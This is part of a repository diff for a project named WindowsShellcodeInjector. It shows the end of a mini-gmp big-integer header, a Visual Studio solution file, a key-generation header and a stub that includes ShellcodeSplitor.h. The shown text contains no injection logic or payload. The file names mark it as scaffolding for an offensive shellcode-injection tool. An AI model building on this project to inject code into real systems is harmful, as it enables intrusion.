185	+	unsigned long mpz_cdiv_q_ui(mpz_t, const mpz_t, unsigned long);
186	+	unsigned long mpz_fdiv_q_ui(mpz_t, const mpz_t, unsigned long);
187	+	unsigned long mpz_tdiv_q_ui(mpz_t, const mpz_t, unsigned long);
188	+	unsigned long mpz_cdiv_r_ui(mpz_t, const mpz_t, unsigned long);
189	+	unsigned long mpz_fdiv_r_ui(mpz_t, const mpz_t, unsigned long);
190	+	unsigned long mpz_tdiv_r_ui(mpz_t, const mpz_t, unsigned long);
191	+	unsigned long mpz_cdiv_ui(const mpz_t, unsigned long);
192	+	unsigned long mpz_fdiv_ui(const mpz_t, unsigned long);
193	+	unsigned long mpz_tdiv_ui(const mpz_t, unsigned long);
194	+
195	+	unsigned long mpz_mod_ui(mpz_t, const mpz_t, unsigned long);
196	+
197	+	void mpz_divexact_ui(mpz_t, const mpz_t, unsigned long);
198	+
199	+	int mpz_divisible_ui_p(const mpz_t, unsigned long);
200	+
201	+	unsigned long mpz_gcd_ui(mpz_t, const mpz_t, unsigned long);
202	+	void mpz_gcd(mpz_t, const mpz_t, const mpz_t);
203	+	void mpz_gcdext(mpz_t, mpz_t, mpz_t, const mpz_t, const mpz_t);
204	+	void mpz_lcm_ui(mpz_t, const mpz_t, unsigned long);
205	+	void mpz_lcm(mpz_t, const mpz_t, const mpz_t);
206	+	int mpz_invert(mpz_t, const mpz_t, const mpz_t);
207	+
208	+	void mpz_sqrtrem(mpz_t, mpz_t, const mpz_t);
209	+	void mpz_sqrt(mpz_t, const mpz_t);
210	+	int mpz_perfect_square_p(const mpz_t);
211	+
212	+	void mpz_pow_ui(mpz_t, const mpz_t, unsigned long);
213	+	void mpz_ui_pow_ui(mpz_t, unsigned long, unsigned long);
214	+	void mpz_powm(mpz_t, const mpz_t, const mpz_t, const mpz_t);
215	+	void mpz_powm_ui(mpz_t, const mpz_t, unsigned long, const mpz_t);
216	+
217	+	void mpz_rootrem(mpz_t, mpz_t, const mpz_t, unsigned long);
218	+	int mpz_root(mpz_t, const mpz_t, unsigned long);
219	+
220	+	void mpz_fac_ui(mpz_t, unsigned long);
221	+	void mpz_bin_uiui(mpz_t, unsigned long, unsigned long);
222	+
223	+	int mpz_probab_prime_p(const mpz_t, int);
224	+
225	+	int mpz_tstbit(const mpz_t, mp_bitcnt_t);
226	+	void mpz_setbit(mpz_t, mp_bitcnt_t);
227	+	void mpz_clrbit(mpz_t, mp_bitcnt_t);
228	+	void mpz_combit(mpz_t, mp_bitcnt_t);
229	+
230	+	void mpz_com(mpz_t, const mpz_t);
231	+	void mpz_and(mpz_t, const mpz_t, const mpz_t);
232	+	void mpz_ior(mpz_t, const mpz_t, const mpz_t);
233	+	void mpz_xor(mpz_t, const mpz_t, const mpz_t);
234	+
235	+	mp_bitcnt_t mpz_popcount(const mpz_t);
236	+	mp_bitcnt_t mpz_hamdist(const mpz_t, const mpz_t);
237	+	mp_bitcnt_t mpz_scan0(const mpz_t, mp_bitcnt_t);
238	+	mp_bitcnt_t mpz_scan1(const mpz_t, mp_bitcnt_t);
239	+
240	+	int mpz_fits_slong_p(const mpz_t);
241	+	int mpz_fits_ulong_p(const mpz_t);
242	+	long int mpz_get_si(const mpz_t);
243	+	unsigned long int mpz_get_ui(const mpz_t);
244	+	double mpz_get_d(const mpz_t);
245	+	size_t mpz_size(const mpz_t);
246	+	mp_limb_t mpz_getlimbn(const mpz_t, mp_size_t);
247	+
248	+	void mpz_realloc2(mpz_t, mp_bitcnt_t);
249	+	mp_srcptr mpz_limbs_read(mpz_srcptr);
250	+	mp_ptr mpz_limbs_modify(mpz_t, mp_size_t);
251	+	mp_ptr mpz_limbs_write(mpz_t, mp_size_t);
252	+	void mpz_limbs_finish(mpz_t, mp_size_t);
253	+	mpz_srcptr mpz_roinit_n(mpz_t, mp_srcptr, mp_size_t);
254	+
255	+	#define MPZ_ROINIT_N(xp, xs) {{0, (xs),(xp) }}
256	+
257	+	void mpz_set_si(mpz_t, signed long int);
258	+	void mpz_set_ui(mpz_t, unsigned long int);
259	+	void mpz_set(mpz_t, const mpz_t);
260	+	void mpz_set_d(mpz_t, double);
261	+
262	+	void mpz_init_set_si(mpz_t, signed long int);
263	+	void mpz_init_set_ui(mpz_t, unsigned long int);
264	+	void mpz_init_set(mpz_t, const mpz_t);
265	+	void mpz_init_set_d(mpz_t, double);
266	+
267	+	size_t mpz_sizeinbase(const mpz_t, int);
268	+	char mpz_get_str(char , int, const mpz_t);
269	+	int mpz_set_str(mpz_t, const char *, int);
270	+	int mpz_init_set_str(mpz_t, const char *, int);
271	+
272	+	/* This long list taken from gmp.h. */
273	+	/* For reference, "defined(EOF)" cannot be used here. In g++ 2.95.4,
274	+	<iostream> defines EOF but not FILE. */
275	+	#if defined (FILE) \
276	+	\|\| defined (H_STDIO) \
277	+	\|\| defined (_H_STDIO) /* AIX */ \
278	+	\|\| defined (_STDIO_H) /* glibc, Sun, SCO */ \
279	+	\|\| defined (_STDIO_H_) /* BSD, OSF */ \
280	+	\|\| defined (__STDIO_H) /* Borland */ \
281	+	\|\| defined (__STDIO_H__) /* IRIX */ \
282	+	\|\| defined (_STDIO_INCLUDED) /* HPUX */ \
283	+	\|\| defined (__dj_include_stdio_h_) /* DJGPP */ \
284	+	\|\| defined (_FILE_DEFINED) /* Microsoft */ \
285	+	\|\| defined (__STDIO__) /* Apple MPW MrC */ \
286	+	\|\| defined (_MSL_STDIO_H) /* Metrowerks */ \
287	+	\|\| defined (_STDIO_H_INCLUDED) /* QNX4 */ \
288	+	\|\| defined (_ISO_STDIO_ISO_H) /* Sun C++ */ \
289	+	\|\| defined (__STDIO_LOADED) /* VMS */
290	+	size_t mpz_out_str(FILE *, int, const mpz_t);
291	+	#endif
292	+
293	+	void mpz_import(mpz_t, size_t, int, size_t, int, size_t, const void *);
294	+	void mpz_export(void , size_t *, int, size_t, int, size_t, const mpz_t);
295	+
296	+	#if defined (__cplusplus)
297	+	}
298	+	#endif
299	+
300	+	// additional defines that some program uses
301	+	#ifndef GMP_LIMB_BITS
302	+	#define GMP_LIMB_BITS (sizeof(mp_limb_t) * CHAR_BIT)
303	+	#endif
304	+	#ifndef GMP_NAIL_BITS
305	+	#define GMP_NAIL_BITS 0
306	+	#endif
307	+	#ifndef GMP_NUMB_BITS
308	+	#define GMP_NUMB_BITS GMP_LIMB_BITS
309	+	#endif
310	+
311	+
312	+	#endif /* __MINI_GMP_H__ */
313	+
314	+
315	+

WindowsShellcodeInjector/mini-gmpxx.h

Diff is too large to be displayed.

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector.sln

1	+
2	+	Microsoft Visual Studio Solution File, Format Version 12.00
3	+	# Visual Studio 15
4	+	VisualStudioVersion = 15.0.28307.1525
5	+	MinimumVisualStudioVersion = 10.0.40219.1
6	+	Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WindowsShellcodeInjector", "WindowsShellcodeInjector\WindowsShellcodeInjector.vcxproj", "{895F5563-64DA-4642-8577-0C5AF67D8F0A}"
7	+	EndProject
8	+	Global
9	+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10	+	Debug\|x64 = Debug\|x64
11	+	Debug\|x86 = Debug\|x86
12	+	Release\|x64 = Release\|x64
13	+	Release\|x86 = Release\|x86
14	+	EndGlobalSection
15	+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug\|x64.ActiveCfg = Debug\|x64
17	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug\|x64.Build.0 = Debug\|x64
18	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug\|x86.ActiveCfg = Debug\|Win32
19	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Debug\|x86.Build.0 = Debug\|Win32
20	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release\|x64.ActiveCfg = Release\|x64
21	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release\|x64.Build.0 = Release\|x64
22	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release\|x86.ActiveCfg = Release\|Win32
23	+	{895F5563-64DA-4642-8577-0C5AF67D8F0A}.Release\|x86.Build.0 = Release\|Win32
24	+	EndGlobalSection
25	+	GlobalSection(SolutionProperties) = preSolution
26	+	HideSolutionNode = FALSE
27	+	EndGlobalSection
28	+	GlobalSection(ExtensibilityGlobals) = postSolution
29	+	SolutionGuid = {7E0E7CF6-0C38-45B4-81F4-D95EA44EB1F5}
30	+	EndGlobalSection
31	+	EndGlobal
32	+

1	+	#pragma once
2	+
3	+	#include<string>
4	+
5	+	void GenerateKey(std::string &public_key, std::string &private_key);

1	+	#include "ShellcodeSplitor.h"
2	+
3	+

have fun